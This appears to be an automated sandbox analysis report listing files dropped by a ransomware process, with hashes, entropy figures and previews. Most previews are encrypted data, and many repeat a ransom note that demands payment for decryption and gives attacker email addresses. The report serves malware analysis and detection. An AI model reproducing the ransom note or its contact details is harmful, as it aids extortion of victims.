                                                                                                    Category:dropped
                                                                                                    Size (bytes):380
                                                                                                    Entropy (8bit):7.449486637292258
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:AftzcVnUSE9YNcj/WjHS/dHyxrqBKx3ocrlH6dgDvQUkD/ueSUBrWohlmn:ApknUfYNi/tdSxyKUdGpi3tWohlmn
                                                                                                    MD5:68293A245A0EBA17CF7BA710B97FDB6B
                                                                                                    SHA1:F88CACEDF2CDA59666BEE70FE081DFDE8B869687
                                                                                                    SHA-256:698E9E12B813CF3ADB1804183289498381A76CE4FFE6CBCA6C782F8190CDC478
                                                                                                    SHA-512:34A8EDDD99483CFDB3686B834B536F49959622959FBD41A50E332E699740E252B18D939F47C3B984EE513B2B71EC8BFD40BB5DA0E0774C5026EBFFD377090EEC
                                                                                                    Malicious:false
                                                                                                    Preview:u0.>Pw......k.v.U...|0F.....:n~.p.._......*..X...b.9..[..G]#V..Q.BB.....y....=m..v@.V7..m{.~2..f...&..t.m...........E...o...._.]Ea..Dt.V.S.-F5Rd......3S.R.9.M..'.A...x.....!.R...^1g....n....&.:oJ^..B..jt.y...\5...S...D.&..T.e#h>.....F%.g...:...$..3^..v...4V..+..R.5f..51Q....=+...[.o....\...b-...(.0.d.\..{...)..:......36.E,p.n......M+q.j....0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):378
                                                                                                    Entropy (8bit):7.375115632013691
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:krFz6DiG/vxS0SsbPCXst9j6KcV+JnaLqVZXae5Db/VTH1w50n:2RG/JS0SE9jT6EMqfjb/A2n
                                                                                                    MD5:3D88A2AFC1E37221B13E1CED7612950E
                                                                                                    SHA1:024236242CD0F088BD353F9498AC7C0D5FDF6248
                                                                                                    SHA-256:18EB9AE302CCDE1E664B2DD317BA8CED7548BA0BCC8C63490E124DAEB1AEC932
                                                                                                    SHA-512:33E1B612ADA3F1331E6776AFC13EED6347B463C27647153E5253EE0CF58C762F1B7361FF761C3DECC0FA6BE71A683FAF45652D9033D174D533A619BA9225BDC4
                                                                                                    Malicious:false
                                                                                                    Preview:xW..[!.o....f.......:.....$...T.$..\z`.d3=..e.x@.k....q...E<..U._.b.m.t....6i.1..7.D:k.W.MMDw.youtube.com/..B..6...K..N{W.7.)B1...`)..[..+=....Q..h4..p....................?xC.p.x]...........EN&PuG..s.vw..0......u..:...M.........X?r.8..^..yA.P:....9...~. ..|...%..8.x.Y........$...r.2......\P...zX.0sr~r.=e..wr).......F...G..[*nV.....WQ.1`...p......y.|.0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):378
                                                                                                    Entropy (8bit):7.375115632013691
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:krFz6DiG/vxS0SsbPCXst9j6KcV+JnaLqVZXae5Db/VTH1w50n:2RG/JS0SE9jT6EMqfjb/A2n
                                                                                                    MD5:3D88A2AFC1E37221B13E1CED7612950E
                                                                                                    SHA1:024236242CD0F088BD353F9498AC7C0D5FDF6248
                                                                                                    SHA-256:18EB9AE302CCDE1E664B2DD317BA8CED7548BA0BCC8C63490E124DAEB1AEC932
                                                                                                    SHA-512:33E1B612ADA3F1331E6776AFC13EED6347B463C27647153E5253EE0CF58C762F1B7361FF761C3DECC0FA6BE71A683FAF45652D9033D174D533A619BA9225BDC4
                                                                                                    Malicious:false
                                                                                                    Preview:xW..[!.o....f.......:.....$...T.$..\z`.d3=..e.x@.k....q...E<..U._.b.m.t....6i.1..7.D:k.W.MMDw.youtube.com/..B..6...K..N{W.7.)B1...`)..[..+=....Q..h4..p....................?xC.p.x]...........EN&PuG..s.vw..0......u..:...M.........X?r.8..^..yA.P:....9...~. ..|...%..8.x.Y........$...r.2......\P...zX.0sr~r.=e..wr).......F...G..[*nV.....WQ.1`...p......y.|.0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):266
                                                                                                    Entropy (8bit):7.211512781323706
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:YZqWOSE0C/6rFb9C6gAOpljU3y1MR6DqBrE95vgC3mn:YZqX5V65b9C6gAallY6eo95xmn
                                                                                                    MD5:B1632C79222F14E32F10B4EC9F443A5B
                                                                                                    SHA1:D122484DD99A4AE1462D3A815F0066392B60CC38
                                                                                                    SHA-256:4C94B3CE836C325A6EEE0C2FC0FA1D34B113A5D17ECD7DCF2BAAFD6B95A487E7
                                                                                                    SHA-512:6C3D98815E0D74D5282B339ADCE50974C4C1FCFD5F05A9BFEE697F95A56EEA22C216178C6E131FDAECBF099FDFB485F6C1FF4010FA237381371020ED7B4AC104
                                                                                                    Malicious:false
                                                                                                    Preview:l._.w..a.,F..w.;*.i....D...`.*O2+v$......S....gB.j.JPhUP.Z.F+F.~>.{A..u..4+....5...:2W.e..cE.k.....2.._.2SN#..6..?.'.X0..Ne.q9.....$..Ze...h..^.]....?8C.....}<.f>.f..o..4Zam....H..7..Uf..L..q...'V....iG....I@..6..M;v5....b&...:c..J....&x.....^.0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):266
                                                                                                    Entropy (8bit):7.2006835162062774
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:bKKrWdrC8+CLXzoSkl1RTLbT2UmxzL/EdaRCdT16wmn:0rCazil1RT6UGzDEwRXZn
                                                                                                    MD5:F1FC38A066E4E755C6D40EBBAD55CCA3
                                                                                                    SHA1:E33022ACD73032953F5B2324C6A3F5BC9246105F
                                                                                                    SHA-256:806BF00798944736F4FF7E905F50108B3CB1BE08406EA7F302BCC71E79BA3344
                                                                                                    SHA-512:B3B542DDF29D1F2B1913EEF6373E5C7B74626214FC5F3787390AF3D4EB22D9A3BA02FC823C2592B059AB31DF9D1251F733EBE6169DE70C1F31B420FA6DA13EF6
                                                                                                    Malicious:false
                                                                                                    Preview:......l...+..D.N6.S.>.:.....3;.bi&.)oTPy>F.1.E......o.Y.......AT...;..R9. ..Y....ii..@.N.a.+c.{(g......Ue....+.O....-F].3.$.#...d.=.-<z..n$...`..J.T...A......s5a.ey..4wZZd......q...l..R.L./{X..)..m..%+.{.*Q.?7(.,.x.}_...=.?...\..7tv.8...#.F.FZ.40xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1125
                                                                                                    Entropy (8bit):7.858210266281039
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:oXaT6TJevM8qULDwc2+oxgeUO8OhbzaI9Qh6odEWgCZSCnH:oXSU8vLDSKeyOxeoQsGE8dH
                                                                                                    MD5:24B6D657278473766860F0DE5786E30E
                                                                                                    SHA1:FF6F939D606C94D9F07E5B33EC12F388F5E60695
                                                                                                    SHA-256:B815616294795C4FCCCD00644DFD4AE86D9587030EBE556312522C5E3D347E90
                                                                                                    SHA-512:97CF914C71C6285139CFA4C0C45477060C87B983029A042D5262A47F1DB3D79B228E07F553B464910D283002CB37B1CF8B5D381A8B41A91C9F323B28C2C7D2D1
                                                                                                    Malicious:false
                                                                                                    Preview:..[O..i....h.^:6.@...9.VJq..6G..uW^...I_..y;..N.)),..%..Y..'!S..4..=#.m.n.+`].&G(..rp.....&."SWK.Td38(t-D.1...^..9..6....>.u...-C.F.....x.,....D.a...V....i.>..?.V..C._.<.m.).b=.....v........c)./...z=.'b..7.......y......%.....C.XlBCQ.kd''.Q...E........_J~.X...b!.......>ahH.J......i?....5G.\.....`...8..0...4a...C..G$....n&.&.#ZQ.G...X.8......:.q5.'WX.e.>dR{...Z.......~"1[... ..[6.q.Z..@)..Q8..U.y.k.....u.N.V.......n....2P"aN.@..#..1....o14..k.}.Ag....s......zE.dd.:..Z0.....r]..C..w.+...!...0...o.Yi.<...G..I...[....~..6....$.t..q..B..O...qY........Q`Hf.k`.F.5..(NZ\...G.T.s.."..W...A.....4\hY....%^...j.@..3'."i../.;...HK..=..`.......g:&It.n....I....^BY...2(.{8v.G.5...4.....*.....j?.._.........F!.d.:..7G.....R.u1....y&Pq.8....l..1..9D>......"..]..l..<.g...<.T..b.x..}.......j..S.............1.^.....;jescription>oG...fgu...%K....'./..}....'..Qaw.F.6.Y@.*nA...u......KP-#.~.]]........'..[.4@....n.....u.1.P@n.~.Z|..(.9<|7.A&c..B ......d..4.hr...
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1125
                                                                                                    Entropy (8bit):7.858210266281039
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:oXaT6TJevM8qULDwc2+oxgeUO8OhbzaI9Qh6odEWgCZSCnH:oXSU8vLDSKeyOxeoQsGE8dH
                                                                                                    MD5:24B6D657278473766860F0DE5786E30E
                                                                                                    SHA1:FF6F939D606C94D9F07E5B33EC12F388F5E60695
                                                                                                    SHA-256:B815616294795C4FCCCD00644DFD4AE86D9587030EBE556312522C5E3D347E90
                                                                                                    SHA-512:97CF914C71C6285139CFA4C0C45477060C87B983029A042D5262A47F1DB3D79B228E07F553B464910D283002CB37B1CF8B5D381A8B41A91C9F323B28C2C7D2D1
                                                                                                    Malicious:false
                                                                                                    Preview:..[O..i....h.^:6.@...9.VJq..6G..uW^...I_..y;..N.)),..%..Y..'!S..4..=#.m.n.+`].&G(..rp.....&."SWK.Td38(t-D.1...^..9..6....>.u...-C.F.....x.,....D.a...V....i.>..?.V..C._.<.m.).b=.....v........c)./...z=.'b..7.......y......%.....C.XlBCQ.kd''.Q...E........_J~.X...b!.......>ahH.J......i?....5G.\.....`...8..0...4a...C..G$....n&.&.#ZQ.G...X.8......:.q5.'WX.e.>dR{...Z.......~"1[... ..[6.q.Z..@)..Q8..U.y.k.....u.N.V.......n....2P"aN.@..#..1....o14..k.}.Ag....s......zE.dd.:..Z0.....r]..C..w.+...!...0...o.Yi.<...G..I...[....~..6....$.t..q..B..O...qY........Q`Hf.k`.F.5..(NZ\...G.T.s.."..W...A.....4\hY....%^...j.@..3'."i../.;...HK..=..`.......g:&It.n....I....^BY...2(.{8v.G.5...4.....*.....j?.._.........F!.d.:..7G.....R.u1....y&Pq.8....l..1..9D>......"..]..l..<.g...<.T..b.x..}.......j..S.............1.^.....;jescription>oG...fgu...%K....'./..}....'..Qaw.F.6.Y@.*nA...u......KP-#.~.]]........'..[.4@....n.....u.1.P@n.~.Z|..(.9<|7.A&c..B ......d..4.hr...
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:OpenPGP Secret Key
                                                                                                    Category:dropped
                                                                                                    Size (bytes):292
                                                                                                    Entropy (8bit):7.171682500717397
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:6xY12u3EMsrxPnlD5GyRUM8sIyLxiBKQelAACRMiDgQxhs8w6Zn:0NMsrxPZ5dbzvENelAbRMi4In
                                                                                                    MD5:74503A264DD2824E1FEC9114316411AB
                                                                                                    SHA1:C36AB72628A98A9E34EF7186FABB0EA2C73EBC78
                                                                                                    SHA-256:5BA7DA34E078C5A2D8B869618005226F705631ACE4C04704F37BE1F3AFCF28D7
                                                                                                    SHA-512:2071380EEAF31264B3F7B41D945FCA12AA20067F78E1A68A506DD41114E50EE611D714AFCE697928FA3804A49DAEC88019AD927D0CFEFF13308856AA6467E557
                                                                                                    Malicious:false
                                                                                                    Preview:........t.....4...........o..\../0K..^{..P..y..Km.i..T......O/=...!e..w..z....D.m.:72b.....E.....$..K.i]. ....&..c)..F....#...G.......&...f.V,....>:"....y4._./..<:.....4..=(....t.e<..z....H."...-..t.{..+V.2....Hi...}..4,9....X.S.8.'..L..Y.y!.r-.w....2i..4S...p...f 0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):266
                                                                                                    Entropy (8bit):7.128745817297379
